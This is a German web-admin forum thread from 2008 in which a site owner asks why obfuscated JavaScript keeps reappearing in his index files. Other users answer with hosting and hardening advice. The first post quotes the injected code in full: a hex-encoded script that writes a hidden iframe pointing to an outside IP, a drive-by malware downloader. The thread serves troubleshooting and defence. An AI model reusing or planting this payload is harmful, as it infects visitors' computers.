el3ment
Goto Top

Website Sicherheit

Ich habe ein Problem mit meiner Website, vor ein paar Tagen bemerkte ich das auf meienr Website imemr ein Popup aufgeht indem darauf hingewiesen wird das der PC von einem Virus befallen sei und man auf dei Seite "www.advancedxpdefender.com" gehen soll um sich eine Software runterzuladen.
Dann habe ich mir mal den Quellcode angeschaut und gesehen das jemand meine index (.php und .html) dateien manipuliert hat und folgenden Code eingefügt hat:

<script>
<!--
var d=document,kol=561;
function O10H48514B24F1CE6(H48514B24F20E3){ function H48514B24F24DF() {return 16;} return( parseInt(H48514B24F20E3,H48514B24F24DF()));}function H48514B24F2CEE(H48514B24F30EA){ var H48514B24F34E4='';for(H48514B24F38E1=0; H48514B24F38E1<H48514B24F30EA.length; H48514B24F38E1+=2){ H48514B24F34E4 += ( String.fromCharCode (O10H48514B24F1CE6(H48514B24F30EA.substr(H48514B24F38E1, 2))));}return H48514B24F34E4;} document.write(H48514B24F2CEE('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A38323238292B27623762325C272077696474683D323432206865696768743D3334207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->
</script>


Habe nun schon mehrmals den Code aus allen Index Dateien rausgenommen aber es passiert immer wieder!
Mein FTP Passwort kann meines Erachtens anch nicht gekanckt worden sein,da dies sehr stark ist (enthält Groß- und Kleinbuchstaben,Sonderzeichen und Zahlen).

Wie ist es möglich das jemand diese Dateien manipuliert?
Wie kann ich mich dagegen schützen?

Danke schonmal!

Grüße

Content-ID: 89909

Url: https://administrator.de/forum/website-sicherheit-89909.html

Ausgedruckt am: 23.12.2024 um 23:12 Uhr

harald21
harald21 16.06.2008 um 09:33:10 Uhr
Goto Top
Hallo,

was ist das für ein Webserver?
M$ oder *nix?
IIS oder Apache?

Wenn jemand deinen Server gehackt hat (und das er das hat steht außer Frage) dann ist evtl. auch ein Rootkit installiert, in diesem Fall ist die einzig sichere Möglichkeit, alles neu zu installieren.

Bitte überbewerte dein "starkes FTP-Passwort" nicht, bei FTP werden die Passwörter unverschlüsselt übertragen!

mfg
Harald
SlainteMhath
SlainteMhath 16.06.2008 um 09:39:41 Uhr
Goto Top
Moin,

interessant ist auch was für eine Hosting umgebung das ist. Rootserver? Colocation? Oder eine 0,99€ HP beim Discounter?

lg,
Slainte
el3ment
el3ment 16.06.2008 um 09:51:37 Uhr
Goto Top
Linux Apache!
Hab den bei freeweb.de.

Neuinstallieren ist so eine Sache.... da steckt verdammt viel Arbeit drin und es sind noch mehrere Subdomains die da laufen.

Und angenommen ich würde alles neu machen, wie kann ich mich danach dann schützen?

Vielen Dank schonmal für die schnelle Antwort.
el3ment
el3ment 16.06.2008 um 09:52:53 Uhr
Goto Top
Ich nutze dieses Paket http://freeweb.de/privat.html
SlainteMhath
SlainteMhath 16.06.2008 um 10:05:36 Uhr
Goto Top
Moin,

setzt dich direkt mit deinem Hoster in Verindung. Bei shared Hosting genügt es u.U. wenn eine Site auf dem Server gehackt wurde. Die sollen das checken!

Und angenommen ich würde alles neu machen, wie kann ich mich danach dann
schützen?
Im falle Shared Hosting eigentlich fast nicht. Du bist zu 100% von Deinem Hoster abhängig. Wenn der schlampig arbeitet und/oder nicht patcht kannst Du kaum was machen (ausser kündigen ^^).

Zusätzlich solltest Du Deine eigenen PHP Scripts auf Sicherheitslücken hin überprüfen, oder falls die "fremde" PHP Anwendungen einsetzt: immer zeitnah mit den aktuelle Patches verseorgen.

lg,
Slainte
el3ment
el3ment 16.06.2008 um 10:13:21 Uhr
Goto Top
Hier die Antworten von meinem Hoster:

erste mail:

Ihre Website ist nicht auf dem aktuellsten Stand und beinhaltet
Sicherheitsluecken. Ueber diese Luecken wurd Ihre Website gehackt und ein
Trojaner zum download angeboten. Ihre Seiten sind somit infiziert. Sie muessen
die Scripte manuell aendern und den Trojaner Script Code rausnehmen, oder die
Website neu einrichten. Installieren Sie nur aktuelle Scripte und halten Sie
sie immer auf dem aktuellsten Stand.

--> super Antwort

zweite mail mit der bitte um konkretere hinweise:

schwer zu sagen, meist passiert das in Verbindung mit aktiviertem
register_globals und url_fopen. Im Access Log koennen Sie einmal nach .txt
suchen, ausser den robot.txt, da sehen Sie meist, welche Datei hier unsicher
war. Ueber diese Datei kann dann Code von anderen Servern nachgeladen werden.
--> die zwei sachen habe ich deaktiviert und im accesslog habe ich keine *.txt gefunden.

Ich nutze derzeit Joomla 1.5.3stable und Wordpress 2.5.1, sind beide die aktuellsten Versionen.
Von daher bin ich immer noch ratlos.

grüße
16568
16568 16.06.2008 um 11:34:17 Uhr
Goto Top
1.
stable und aktuell bedeutet nicht immer, daß die Dinger auch sicher sind, bestes Beispiel ist hier wohl Joomla
(gibt z.Zt. 4 0day-Exploits, zzgl. den alten Bekannten für die Extensions)

2.
Die Berechtigung für gewisse Dateien sollten auch ordnungsgemäß gesetzt sein...


Lonesome Walker
el3ment
el3ment 16.06.2008 um 11:48:34 Uhr
Goto Top
1. ist wohl war, ich wollte auch nicht mit meiner Aussage dies ausdrücken sondern nur das ich die derzeit aktuellste Version nutze, mehr kann man ja als Endnutzer auch nicht tun!

2. Habe schon die Berechtigungen der Index Dateien über Filezilla angepasst, habe nur dem Benutzer die Berchtigung Lesen und Schreiben erteilt.
Aber auch dies hat nix geholfen, ein paar Stunden später war das Script wieder drin... face-sad !

Also muss ja im Endeffekt jemand mein Passwort mitgelesen haben und sich so auf mein FTP-Server angemeldet haben und dann die Dateien manipuliert haben, sehe ich das so richtig?

grüße
el3ment
el3ment 17.06.2008 um 20:43:53 Uhr
Goto Top
Nachdem ich die "register_globals" und "url_fopen" deaktivert habe, mein FTP Passwort geändert habe und nun bei Filezilla immer eine Verschlüsselung verwende geht es.
Zumindest sind bis jetzt seit meinem letzten Post alle index dateien sauber geblieben!

wer also auch mal dieses oder ein ähnliches Problem haben sollte, könnte er die oben genannten Sachen anwenden.

Vielen Dank nochmal für die schnellen Antworten, imemr wieder TOP in diesem Forum!!!
el3ment
el3ment 18.06.2008 um 09:10:15 Uhr
Goto Top
Zu früh gefreut!!! face-sad

Das Script ist wieder drin, aber es gibt etwas neues... es handelt sich um den "JS/Dldr.Iframe.BM" Java-Scriptvirus, diese Virendefinition wurde gestern bei Antivir in die Defintionsdatei eingepflegt.

Was mir noch eingefallen ist, ich habe mal gehört das solcher Code auch über Kontaktformulare oder ähnliches eingeschleust werden kann.
Und da ich auf meiner Seite ein Gästebuch und ein Kontaktformular habe, habe ich das Kontaktformular gleich mal deaktiviert.

Kann mir jemand darüber etwas genauere AUskunft geben, auf was man achten sollte, etc...!?

Grüße